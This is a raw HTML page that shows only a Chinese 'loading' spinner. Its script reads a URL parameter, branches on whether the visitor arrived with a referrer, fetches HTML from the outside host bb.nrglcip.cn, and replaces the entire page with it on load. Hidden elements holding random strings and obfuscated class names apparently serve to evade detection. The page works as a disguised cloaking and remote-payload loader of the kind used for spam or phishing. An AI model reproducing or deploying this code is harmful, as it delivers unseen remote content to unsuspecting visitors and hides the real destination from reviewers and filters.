<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .sZ4Hibd1a {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .sZ4Hibd1a .FtTnRycPPQ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .sZ4Hibd1a .content {
            line-height: 50px;
            text-align: center
        }

        .sZ4Hibd1a .img {
            width: 100%
        }

        .sZ4Hibd1a .IRL48Q {
            text-align: center
        }

        .sZ4Hibd1a .IRL48Q span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .sZ4Hibd1a .IRL48Q span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .sZ4Hibd1a .IRL48Q span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .sZ4Hibd1a .IRL48Q span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .sZ4Hibd1a .IRL48Q span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .sZ4Hibd1a .IRL48Q span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .sZ4Hibd1a .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function V5VHr2Z9Fs(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var nIBTcK = V5VHr2Z9Fs('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ nIBTcK +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ nIBTcK +".html?a=share";
		}
		
        wZI1sZ34=url+"#"+new Date().getTime();
        wZI1sZ34 && function() {
            $.get(wZI1sZ34, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>Zlq9cvaVRqgGnF14WQduEGF39Pe03oW</div>
<ul style='display:none' >fGaQrJw15yQJYCKCEFqvzFqSK4rKl</ul>
<li style='display:none' >arzmya92z3MRHJR</li>
<b style='display:none' >kWV6Qhz19thGKZ</b>
<p  style='display:none'>xAZSvx7RYdQhM8FOc0XRyGIHWQwd6u9y</p>
<a  href='#' style='display:none'>iUCNHif3dGaB4LX2U0a4B5X1U6dOJcod9jpQLObg</a>
<img  src='' style='display:none'>
<div style='display:none'>Zlq9cvaVRqgGnF14WQduEGF39Pe03oW</div>
<h1 style='display:none' >cFZKRwCwYhjY3G</h1><div class="sZ4Hibd1a">
    <div class="FtTnRycPPQ">
        <div class="IRL48Q">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >tfpBy1UUEvTSjOtJNNIqiGoyKYNRRbXIhEJqcBCm9mkA</h1>
<a  href='#' style='display:none'>zzRUX3Bxk8IJZwAmH0iyK5wGFPTO1cD1FvZEdRIOUdpjMLV18DZe7La6RSigi</a>
<p  style='display:none'>OHKeKiJi0wuJrv5</p>
<div style='display:none'>sFpW9clUCxpK2LTRblMY5NrEtqjeT9pnRP6l3hIIdhb5jFkukGi10Ou32EqL9j1iXet1Q3GuJcjo4zWPrNRsFOu7H9ShbT</div></body>
</html>